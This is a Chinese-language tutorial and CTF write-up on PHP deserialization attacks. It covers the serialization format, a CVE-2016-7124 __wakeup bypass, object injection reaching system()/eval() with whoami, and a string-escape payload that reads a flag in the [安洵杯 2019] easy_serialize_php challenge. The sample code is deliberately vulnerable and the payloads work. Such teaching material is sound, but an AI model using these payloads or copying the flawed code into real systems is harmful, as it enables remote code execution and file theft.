基础知识

我理解的反序列化操作:当对反序列化的字符串可控时,通过伪造成功的字符串,覆盖目标代码中的字符串

读取反序列化的代码对做题很重要,来个例子

  1. <?php
  2. class Test{
  3. public $a = 'My';
  4. protected $b = 'Name';
  5. private $c = 'C_soon5';
  6. }
  7. $object = new Test();
  8. echo serialize($object);

输入结果:O:4:”Test”:3:{s:1:”a”;s:2:”My”;s:4:” * b”;s:4:”Name”;s:7:” Test c”;s:7:”C_soon5”;}
下面对这个结果进行分析

  1. 首先是最外面是实例对象的一些修饰,O表示实例对象,4表示该对象名称有4个字符,"Test"表示对象名称,3表示有3个属性
  2. {}用来包含对象里面的内容,;分隔类型和名称,:分隔属性和值
  3. 属性类型:属性长度:"属性名称";值类型:值长度:"值内容"
  4. s:1:"a";s:2:"My";
  5. s:4:" * b";s:4:"Name";
  6. s:7:" Test c";s:7:"C_soon5";
  7. 注意点:当访问控制修饰符(publicprotectedprivate)不同时,序列化后的结果也不同
  8. public 被序列化的时候属性名 不会更改
  9. protected 被序列化的时候属性名 会变成 %00*%00属性名
  10. private 被序列化的时候属性名 会变成 %00类名%00属性名

属性类型表格

a array数组
b boolean判断类型
d double浮点数
i integer整数型
o common object 一般的对象
r reference引用类型
s string字符串类型
C custom object
O class
N null
R pointer reference
U unicode string

实战了解反序列化

CVE-2016-7124

PHP5 < 5.6.25、PHP7 < 7.0.10

首先要了解PHP的魔法函数

  1. __construct() 创建对象时触发
  2. __destruct() 对象被销毁时触发
  3. __call() 在对象上下文中调用不可访问的方法时触发
  4. __callStatic() 在静态上下文中调用不可访问的方法时触发
  5. __get() 用于从不可访问的属性读取数据
  6. __set() 用于将数据写入不可访问的属性
  7. __isset() 在不可访问的属性上调用isset()或empty()触发
  8. __unset() 在不可访问的属性上使用unset()时触发
  9. __invoke() 当脚本尝试将对象调用为函数时触发
  10. __toString() 把类当作字符串使用时触发
  11. __wakeup() 使用unserialize时触发
  12. __sleep() 使用serialize时触发

调用 unserilize() 方法成功地重新构造对象后,如果 class 中存在 wakeup 方法,反序列化前会调用 wakeup 方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过 __wakeup 的执行,实例代码如下:

  1. <?php
  2. class Test{
  3. public $cmd;
  4. function __wakeup(){
  5. echo "cmd is null";
  6. $this->cmd = '';
  7. }
  8. function __destruct(){
  9. @system($this->cmd);
  10. }
  11. }
  12. $test = $_GET['cmd'];
  13. @unserialize($test);
  14. ?>

通过代码,生成正常的序列化字符串

  1. <?php
  2. class Test{
  3. public $cmd='whoami';
  4. }
  5. $cmd = new Test();
  6. echo serialize($cmd);
  7. 输出结果:
  8. O:4:"Test":1:{s:3:"cmd";s:6:"whoami";}

将结果传参后,发现输出”cmd is null”,因为上面代码通过unserialize反序列化前,调用了 wakeup 方法将 $cmd 参数置为空,在程序退出时执行 destruct 方法时也就执行不了任何命令
image.png
这里通过修改对象属性个数,绕过__wakeup方法,这样$cmd就有值了
O:4:”Test”:2:{s:3:”cmd”;s:6:”whoami”;}
image.png

对象注入

构造目标同名对象,使得析构函数调用构造的方法,实现任意代码执行

实例代码如下:

  1. <?php
  2. class A{
  3. var $target;
  4. function __construct(){
  5. $this->target = new B;
  6. }
  7. function __destruct(){
  8. $this->target->action();
  9. }
  10. }
  11. class B{
  12. function action(){
  13. echo "action B";
  14. }
  15. }
  16. class C{
  17. var $test;
  18. function action(){
  19. eval($this->test);
  20. }
  21. }
  22. @unserialize($_GET['cmd']);

构造反序列化字符串

  1. <?php
  2. class A{
  3. var $target;
  4. function __construct(){
  5. $this->target = new C;
  6. $this->target->test = "system('whoami');";
  7. }
  8. }
  9. Class C{
  10. var $test;
  11. }
  12. echo serialize(new A());
  13. ?>
  14. 输出结果:
  15. O:1:"A":1:{s:6:"target";O:1:"C":1:{s:4:"test";s:17:"system('whoami');";}}

image.png

对象逃逸

原题链接:[安洵杯 2019]easy_serialize_php
实例代码+分析:

  1. <?php
  2. #定义GET传参名称
  3. $function = @$_GET['f'];
  4. #定义过滤函数,在下面序列化时用到
  5. function filter($img){
  6. $filter_arr = array('php','flag','php5','php4','fl1g');
  7. $filter = '/'.implode('|',$filter_arr).'/i';
  8. return preg_replace($filter,'',$img);
  9. }
  10. #清空SESSION信息
  11. if($_SESSION){
  12. unset($_SESSION);
  13. }
  14. #定义变量$_SESSION的值,数组形式
  15. $_SESSION["user"] = 'guest';
  16. $_SESSION['function'] = $function;
  17. #将POST传参更改为变量,如a=123-->$a=123,下面POST传参会用到
  18. extract($_POST);
  19. #定义访问页面时的页面
  20. if(!$function){
  21. echo '<a href="index.php?f=highlight_file">source_code</a>';
  22. }
  23. #定义GET传参ima_path的值,如果没有值,默认为guest_img.png,如果有值,则sha1进行加密
  24. if(!$_GET['img_path']){
  25. $_SESSION['img'] = base64_encode('guest_img.png');
  26. }else{
  27. $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
  28. }
  29. #定义序列化的值,可以通过POST传参获取
  30. $serialize_info = filter(serialize($_SESSION));
  31. if($function == 'highlight_file'){
  32. highlight_file('index.php');
  33. }else if($function == 'phpinfo'){
  34. eval('phpinfo();'); //maybe you can find something in here!
  35. }else if($function == 'show_image'){
  36. $userinfo = unserialize($serialize_info); #对过滤过的字符串进行反序列化
  37. #对base64解密过的img下标对应的值进行读取
  38. echo file_get_contents(base64_decode($userinfo['img']));
  39. }

分析代码得知:
1.想通过更改img_path的值读取是不行的了,因为为sha1加密
2.这里有extract变量覆盖+filter过滤函数

在做题之前,先了解一下反序列化的机制
一、反序列化的过程是有一定识别范围的,在这个范围之外的字符(例子中的abc)都会被忽略,不影响反序列化的正常进行。

  1. <?php
  2. $str='a:2:{i:0;s:7:"C_soon5";i:1;s:5:"aaaaa";}abc';
  3. var_dump(unserialize($str));
  4. 输出结果:
  5. array(2) {
  6. [0]=>
  7. string(7) "C_soon5"
  8. [1]=>
  9. string(5) "aaaaa"
  10. }

二、逃逸机制(考点)

  1. <?php
  2. $_SESSION["user"]='flagflagflagflagflagflag';
  3. $_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
  4. $_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
  5. echo (serialize($_SESSION));
  6. ?>
  7. 输出结果:
  8. a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

这里通过filter函数进行过滤,看输出的结果是什么

  1. <?php
  2. function filter($data){
  3. $filter_arr = array('php','flag','php5','php4','fl1g');
  4. $filter = '/'.implode('|',$filter_arr).'/i';
  5. return preg_replace($filter,'',$data);
  6. }
  7. $_SESSION["user"]='flagflagflagflagflagflag';
  8. $_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
  9. $_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
  10. echo unserialize(filter(serialize($_SESSION)));
  11. ?>
  12. 输入结果:
  13. a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

图解分析
image.png
因为这里flagflagflagflag被过滤,所以缺少24个字符,需要补上,而原来包含”flagflagflagfalg”中的右边的双引号,这时被当成了普通字符串,直到24个字符到了为止,而24个字符到了,这里是少个双引号的,这里就由定义的字符串中的a”给补上了,因为反序列化在{}匹配成功后,别的字符就不管了,所以新的序列化字符串就为
a:3:{s:4:”user”;s:24:””;s:8:”function”;s:59:”a”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;s:2:”dd”;s:1:”a”;}
img的值就可以通过这种方法间接控制。

在解释一下为啥要带一个s:2:”dd”;s:1:”a”;,因为根据题目的代码,这里是需要三个属性和值的,因为function被吃掉了,形成了普通字符串,所以需要另外一个对象,这里可以随便定义,只要符合序列化规范就行

回到题目中,代码中有phpinfo可以读取,发现里面有flag读取提示文件
image.png

根据上面的解析,payload如下:
Get:f=show_image
Post:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;s:2:”dd”;s:1:”a”;}
image.png
查看源代码,还要读取。
image.png

这里对/d0g3_fllllllag进行base64加密后,发现也是24位,所以刚才payload的base64内容变下就行
Get:f=show_image
Post:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a”;s:3:”img”;s:20:”L2QwZzNfZmxsbGxsbGFn”;s:2:”dd”;s:1:”a”;}
image.png